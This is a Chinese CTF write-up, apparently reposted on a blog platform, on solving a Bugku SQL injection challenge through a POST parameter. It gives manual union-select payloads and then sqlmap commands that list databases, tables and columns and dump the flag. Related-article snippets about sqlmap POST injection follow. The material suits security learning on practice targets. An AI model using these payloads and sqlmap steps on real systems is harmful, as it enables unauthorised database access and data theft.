用sqlmap跑post型注入

最新推荐文章于 2024-05-21 20:29:55 发布
最新推荐文章于 2024-05-21 20:29:55 发布
阅读量2k 收藏 3
点赞数
文章标签: 数据库 python
原文链接:http://www.cnblogs.com/zaqzzz/p/9580749.html
版权

bugku-成绩单 题目地址

手工注入:

①看到题目,分别提交1,2,3,出现不同的成绩单,可见参数我们是可以控制,通过POST的方式。

②我们尝试输入1 and 1=1#1 and 1=2#发现不报错,应该不是数字型注入。我们输入1',报错,这个数字(id)被'保护起来了。猜测SQL语句:~~~~where id ='$id';我们继续输入1' and 1=1#;和1' and 1=2#,发现前边没错,后边的错了,到了这里 注入点就找到了。

顺便获取有几个显示位。
1397720-20180903203357315-1338249.png
到5报错,说明有四个可能回显的位置。

union select 1,2,3,4#
1397720-20180903203405480-189575682.png

四个位置全部可以回显查询的内容。

③查找所有的数据库,输入-1' union select 1,2,3,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA#

1397720-20180903203424905-307974335.png

获得了所有数据库,不过肯定是普通用户,还是只有查看的权限。查询下user()

1397720-20180903203445989-1149432928.png

④查找skctf_flag下的表。-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

1397720-20180903203511795-730973165.png

⑤查看fl4g下的列名。-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

1397720-20180903203521990-1540875937.png

⑥ 查看skctf_flag下的内容。-1' union select 1,2,3,skctf_flag from skctf_flag.fl4g#
1397720-20180903203531205-1578651124.png

SQLMAP跑:

①首先,开burp截包。

②输入1,提交。

可以看见,burp已经把id获取到了

copy to file,保存为txt文件。

1397720-20180903210346566-1764681402.png
把这个txt放置到sqlmap的目录下边。

④打开sqlmap,shift+鼠标右键打开命令行。python sqlmap.py -r a.txt (a.txt如果没有放到sqlmap目录就用绝对路径)。

1397720-20180903210418930-801152875.png

可以看到,存在的注入类型(union查询和基于时间的盲注)和payload和数据库类型和版本都给你报出来了。
然后剩下的参数就基本和跑get型注入差不多了。

⑤获取所有数据库。python sqlmap.py -r a.txt --dbs

1397720-20180903210428694-96885518.png

⑥获取skctf_flag下所有的表。python sqlmap.py -r a.txt -D skctf_flag --tables

1397720-20180903210611597-1115386798.png

⑦获取fl4g下所有的列。python sqlmap.py -r a.txt -D skctf_flag -T fl4g --columns
1397720-20180903210622403-686441927.png

⑧获取列skctf_flag下的内容。python sqlmap.py -r a.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump
1397720-20180903210633528-488445777.png

转载于:https://www.cnblogs.com/zaqzzz/p/9580749.html

weixin_30387339
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 995
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
5、sqlmap注入post+os-shell
最新发布
weixin_51520483的博客
05-21 366
3、上bp抓取数据包,sqlmmap用post注入走一遍,找到数据库,账号密码,这里的账号密码其实也没什么用,形同虚设。5、试一下shell注入,一试一个准,直接进去了,查看一下根目录发现flag。2、判断注入,是一个字符注入,使用or直接绕过密码进去了。6、成功进入shell,查看根目录文件,发现flag。3、发现数据库没有机会的情况,换os-shell注入。4、老规矩,数据表、字段挨个走一遍,但没有什么发现。-r:表示目标为一个文件,bp抓的包。-p:表示一个参数,即一个注入的口。
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 3817
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
faka(利用sqlmappost注入
weixin_50644630的博客
09-20 487
进入faka界面 用burpsuite抓包工具,抓取交互数据 将数据包保存到sqlmap的目录(或者绝对目录) 利用sqlmap 查看数据库 sqlmap -r "b.txt" --dbs 查看数据库faka里的表 sqlmap -r "b.txt" -D faka --tables 查看ayangw_config中的字段 sqlmap -r "b.txt" -D faka -T ayangw_config --columns 查看后台账号和密码 sqlma
sqlmap执行POST注入的两种方式
热门推荐
good good study
07-08 1万+
我们都知道在web中进行数据传参用的最多的就是GET或者POST方法,所以根据此我们也可以把注入分为GET注入POST注入 GET:http://192.168.80.146/2_Shotting_Range/sql/Less-1/?id=1 通过在可见的URL中进行传参 POST:与数据库交互是通过post数据进行,url不可见 post注入例子 有两种方法,一种是-r的方式,另一种是--data 1. sqlmap -r 如下获取到post的数据,在我们可能认为存在注..
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
SQLMAP注入使用
05-13
SQLMAP注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
sqlmap注入
10-26
SQLMap是一种广泛使用的开源自动化工具,专门用于检测和利用SQL注入漏洞。它的主要目标是帮助安全研究人员和渗透测试者在Web应用程序中发现和利用数据库漏洞。以下是对SQLMap注入相关知识点的详细介绍: **1. SQL...
SQLMAP神器使用.pdf
01-05
- POST注入:通过BURP抓包工具捕获POST请求,保存为文件(如1.txt),然后使用`-r`参数读取文件,如`python2 sqlmap.py -r c:/1.txt`。 3. **常用命令**: - `-r`:读取POST请求数据。 - `-p`:指定注入参数。 ...
第九节 Sqlmap注入位置介绍-01
09-15
Sqlmap 注入位置介绍 Sqlmap 是一个开源的 penetration testing工具,旨在检测和利用 SQL 注入漏洞。下面是关于Sqlmap 注入位置的详细介绍: 一、Sqlmap 注入介绍 Sqlmap 注入是指通过将恶意的 SQL 命令插入到 ...
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4638
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST注入的方法。
Kali下Sqlmap工具使用方法之POST方法篇
Liu_Bruce的博客
09-18 5635
大家好,上周讲解了SQL注入漏洞实验的GET方法测试过程。今天向大家继续讲解SQL注入漏洞的POST方法测试过程。工具是大家熟悉的SqlmapSqlmap是一款开源的SQL注入漏洞检测与利用神器,没有之一。测试平台是漏洞扫描工具AWVS的测试平台:http://testphp.vulnweb.com,kali系统,今天还用到抓包工具OWASP ZAP2.5.0。因为POST方法需要用抓包工具抓到post请求包,然后存成txt文件。 下面介绍一下操作步骤: ——————————————...
sqlmap post注入
zhaozhanyong的专栏
11-19 5898
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2940
使用sqlmap进行post注入学习笔记
SQL注入-显错注入Rank 1-Sqlmap
purvispanwu的博客
12-18 3263
网络安全,sqlmap,sql注入
sqlmappost使用方法
sinat_41380394的博客
08-21 2763
http://120.24.86.145:8002/chengjidan/index.php 注入通过post提交id查询。 1.使用burpSuite拦截post包,复制下数据包为a.txt 2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有 例如 sqlmap -r a.txt -p username --batch --dum...
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4148
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
Sqlmap的基本用法
m0_74989372的博客
04-12 846
id=1 -C"username,password" --dump -T users -D security)爆指定数据库的表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆数据库python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?爆所有表 (python sqlmap.py -u 127.0.0.1:8080/sqlilabs/Less-1/?用sql注入靶场进行演示。
sqlmap post怎么找注入
05-25
在使用 SQLMap 进行 POST 注入时,可以通过以下步骤来寻找注入点: 1. 首先,使用 Burp Suite 或其他代理工具来拦截 POST 请求,将请求数据保存到一个文件中。 2. 打开 SQLMap,并使用以下命令来进行测试: ``` sqlmap -r request.txt --level=5 --risk=3 ``` 其中,`request.txt` 是保存 POST 请求数据的文件名,`--level` 和 `--risk` 都是用来设置 SQLMap 的测试级别和风险等级的参数。 3. SQLMap 会对请求数据进行分析,并尝试自动检测注入点。如果检测到注入点,SQLMap 会输出相应的信息,如注入点的 URL、参数名称、数据库等。 4. 如果 SQLMap 没有自动检测到注入点,可以尝试手工指定参数进行测试,例如: ``` sqlmap -r request.txt -p username --level=5 --risk=3 ``` 其中,`-p` 参数用来指定要测试的参数名称,这里我们指定了 `username` 参数进行测试。 5. 根据 SQLMap 的输出结果,进一步测试并利用注入漏洞,例如获取数据库信息、执行 SQL 命令等。 注意:在进行 SQL 注入测试时,请务必遵守法律法规和道德规范,避免对他人的系统造成不必要的损害和影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值